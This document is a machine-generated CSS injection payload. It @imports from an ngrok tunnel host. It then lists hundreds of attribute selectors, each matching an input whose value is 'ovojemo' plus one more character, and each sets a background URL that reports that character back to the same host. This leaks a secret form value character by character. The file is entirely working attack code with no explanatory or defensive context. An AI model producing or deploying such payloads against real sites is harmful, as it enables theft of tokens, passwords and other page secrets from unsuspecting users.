@import url("http://bc0a37bcf1d5.ngrok.io/?l=9");
input[value="ovojemo!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.7472326994894152");}
input[value="ovojemo\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.23128687810553594");}
input[value="ovojemo#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.6368937656483362");}
input[value="ovojemo$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.6587349441713912");}
input[value="ovojemo%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.052542689041477963");}
input[value="ovojemo&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.5186183006918876");}
input[value="ovojemo'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.10683970269323773");}
input[value="ovojemo("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.6407663623013977");}
input[value="ovojemo)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.6298617008128753");}
input[value="ovojemo*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.15326751229713276");}
input[value="ovojemo+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.9568508353762464");}
input[value="ovojemo,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.12817202051063803");}
input[value="ovojemo-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.026924000869938736");}
input[value="ovojemo."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.9096533114819956");}
input[value="ovojemo/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.5382686548545121");}
input[value="ovojemo0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.2903252182999938");}
input[value="ovojemo1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.09976770095619147");}
input[value="ovojemo2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.2962421798144046");}
input[value="ovojemo3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.48286155720393875");}
input[value="ovojemo4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.8388495843125543");}
input[value="ovojemo5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.06886819834210023");}
input[value="ovojemo6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.7800249532849897");}
input[value="ovojemo7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.007426699402491188");}
input[value="ovojemo8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.9769636684886536");}
input[value="ovojemo9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.56783824854468");}
input[value="ovojemo:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.5580878296188139");}
input[value="ovojemo;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.7118484822624702");}
input[value="ovojemo<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.07197611825292016");}
input[value="ovojemo="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.248251544202164");}
input[value="ovojemo>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.30491893119461766");}
input[value="ovojemo?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.5172058862686808");}
input[value="ovojemo@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.33684883975486635");}
input[value="ovojemoA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.3674625797283999");}
input[value="ovojemoB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.47891897800431127");}
input[value="ovojemoC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.9969023642246666");}
input[value="ovojemoD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.2523281896693639");}
input[value="ovojemoE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.5348769093274117");}
input[value="ovojemoF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.6114418912533692");}
input[value="ovojemoG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.7769676214508232");}
input[value="ovojemoH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.09200907613691056");}
input[value="ovojemoI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.1696432674842414");}
input[value="ovojemoJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.771910986841315");}
input[value="ovojemoK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.4724531636289735");}
input[value="ovojemoL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.8274496650201277");}
input[value="ovojemoM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.35086989339747565");}
input[value="ovojemoN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.23719593449080345");}
input[value="ovojemoO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.43595736945490016");}
input[value="ovojemoP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.6942711476015984");}
input[value="ovojemoQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.5616036139029497");}
input[value="ovojemoR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.45125013996763297");}
input[value="ovojemoS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.23889894293213176");}
input[value="ovojemoT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.8665115115632063");}
input[value="ovojemoU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.2857095354542367");}
input[value="ovojemoV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.11768009398171708");}
input[value="ovojemoW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.7260259206419921");}
input[value="ovojemoX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.1307848126771236");}
input[value="ovojemoY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.9488794153128419");}
input[value="ovojemoZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.10243007056978715");}
input[value="ovojemo["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.664311945553401");}
input[value="ovojemo\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.5019849630883804");}
input[value="ovojemo]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.39467650100382845");}
input[value="ovojemo^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.005623592292076651");}
input[value="ovojemo_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.9938829697984048");}
input[value="ovojemo`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.5409810001154398");}
input[value="ovojemoa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.96838553575581");}
input[value="ovojemob"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.16848677188203065");}
input[value="ovojemoc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.43590083888774633");}
input[value="ovojemod"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.8199312786107049");}
input[value="ovojemoe"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.007426038820357306");}
input[value="ovojemof"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.019248107427141337");}
input[value="ovojemog"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.5134959809280355");}
input[value="ovojemoh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.9892731299099635");}
input[value="ovojemoi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.5533607060441279");}
input[value="ovojemoj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.5135912963314246");}
input[value="ovojemok"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.5792855488098039");}
input[value="ovojemol"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.2977397262305814");}
input[value="ovojemom"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.7612691033351511");}
input[value="ovojemon"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.9268761334887197");}
input[value="ovojemoo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.1930811468386342");}
input[value="ovojemop"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.12098061058940712");}
input[value="ovojemoq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.8198733171973192");}
input[value="ovojemor"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.8722626794244728");}
input[value="ovojemos"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.6757662478195152");}
input[value="ovojemot"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.9121336978373713");}
input[value="ovojemou"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.5698343928855283");}
input[value="ovojemov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.6656126981468784");}
input[value="ovojemow"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.8599400220394893");}
input[value="ovojemox"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.9868258150860238");}
input[value="ovojemoy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.4194801372081749");}
input[value="ovojemoz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.8108016318229252");}
input[value="ovojemo{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.6239592622431507");}
input[value="ovojemo|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.5063060321660371");}
input[value="ovojemo}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.5428996497261902");}
input[value="ovojemo~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.8844528597162038");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.0891140394765737");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6781915980799267");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4845255450662511");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5337299410730243");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8050656608384197");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9928174912164247");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6642907248794445");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4048740462802978");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9663797344487357");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8361198656209212");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.31153278825131236");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7920457503542484");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5216144373014426");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6757544372732491");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3594724342994773");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3501359406346394");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1500796837258409");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5584550801148358");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.22172475886242893");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7969624316074098");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.527017050141847");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6691844540515166");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6255754827951512");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8586281956749389");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.10125158804971157");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.14792351037304852");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7910971949324435");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.5229188954839556");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3227310655616191");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.021259339831241952");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1595329549777207");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8494686719829265");}
input[value="ovojemo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.27072305322617174");}
input[value="ovojemo "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.7417330191379075");}
input[value="ovojemo¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.8072809750435137");}
input[value="ovojemo¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.9006450641102495");}
input[value="ovojemo£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.32996520213607994");}
input[value="ovojemo¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.6713886545054044");}
input[value="ovojemo¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.3196855797269462");}
input[value="ovojemo¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.5956180126896116");}
input[value="ovojemo§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.2887611437301567");}
input[value="ovojemo¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.833745912763693");}
input[value="ovojemo©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.4213633383147133");}
input[value="ovojemoª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.6154750605867276");}
input[value="ovojemo«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.25947711645240523");}
input[value="ovojemo¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.20400672454213864");}
input[value="ovojemo­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.9540094126884873");}
input[value="ovojemo®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.2882570496445367");}
input[value="ovojemo¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.20755867374103487");}
input[value="ovojemo°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.7001903160308856");}
input[value="ovojemo±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.18023034377922764");}
input[value="ovojemo²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.5950246796823508");}
input[value="ovojemo³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.2524037168089597");}
input[value="ovojemo´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.882996946757507");}
input[value="ovojemoµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.22017510044965793");}
input[value="ovojemo¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.07690474465706765");}
input[value="ovojemo·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.035935030328198");}
input[value="ovojemo¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.4627899267193063");}
input[value="ovojemo¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.1797234112467636");}
input[value="ovojemoº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.8587955778159486");}
input[value="ovojemo»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.7494876621539155");}
input[value="ovojemo¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.6548729829800317");}
input[value="ovojemo½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.4245406897229531");}
input[value="ovojemo¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.11227289220665937");}
input[value="ovojemo¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.17491930700687086");}
input[value="ovojemoÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.8063689191467511");}
input[value="ovojemoÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.6641553629922912");}
input[value="ovojemoÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.4154766424218854");}
input[value="ovojemoÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.597886436556347");}
input[value="ovojemoÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.019873838670358523");}
input[value="ovojemoÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.13231305594719323");}
input[value="ovojemoÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.8860124683852781");}
input[value="ovojemoÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.4929784227783631");}
input[value="ovojemoÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.9399015495557883");}
input[value="ovojemoÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.70231815631754");}
input[value="ovojemoÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.5052398144539179");}
input[value="ovojemoË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.6457792796566673");}
input[value="ovojemoÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.36617156817124963");}
input[value="ovojemoÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.3750118730918133");}
input[value="ovojemoÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.35495441211969947");}
input[value="ovojemoÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.008553866160396995");}
input[value="ovojemoÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.3435672865763224");}
input[value="ovojemoÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.08515622995247107");}
input[value="ovojemoÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.5878293322078132");}
input[value="ovojemoÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.6844035750340287");}
input[value="ovojemoÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.3292125793465235");}
input[value="ovojemoÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.8039348379761486");}
input[value="ovojemoÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.27963040068572664");}
input[value="ovojemo×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.578911436814562");}
input[value="ovojemoØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.3049885044147558");}
input[value="ovojemoÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.23165637238025694");}
input[value="ovojemoÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.08010198370962263");}
input[value="ovojemoÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.2746958333888745");}
input[value="ovojemoÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.7894745571734558");}
input[value="ovojemoÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.33618364518601673");}
input[value="ovojemoÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.8000858145860681");}
input[value="ovojemoß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.9659737969329238");}
input[value="ovojemoà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.7232324563070585");}
input[value="ovojemoá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.9867003365176306");}
input[value="ovojemoâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.16668356739858958");}
input[value="ovojemoã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.5254959263934935");}
input[value="ovojemoä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.7416644837622064");}
input[value="ovojemoå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.4696157274415955");}
input[value="ovojemoæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.951116527347921");}
input[value="ovojemoç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.8149368374494288");}
input[value="ovojemoè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.41814438358426353");}
input[value="ovojemoé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.2188312573337703");}
input[value="ovojemoê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.43536035811537754");}
input[value="ovojemoë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.37626252856141984");}
input[value="ovojemoì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.051119343655367855");}
input[value="ovojemoí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.31883528646081016");}
input[value="ovojemoî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.23498515543303533");}
input[value="ovojemoï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.8604327499061222");}
input[value="ovojemoð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.2870780036638383");}
input[value="ovojemoñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.01623160088837694");}
input[value="ovojemoò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.8827603792320293");}
input[value="ovojemoó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.681906390431382");}
input[value="ovojemoô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.5309771183262078");}
input[value="ovojemoõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.44982161055411884");}
input[value="ovojemoö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.44732196479441755");}
input[value="ovojemo÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.3166205037006329");}
input[value="ovojemoø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.09493969783756828");}
input[value="ovojemoù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.63082159986834");}
input[value="ovojemoú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.14389218573092188");}
input[value="ovojemoû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.4916448266595148");}
input[value="ovojemoü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.873543080100667");}
input[value="ovojemoý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.8761274216623507");}
input[value="ovojemoþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.0854934357258843");}
input[value="ovojemoÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.7915422130110099");}
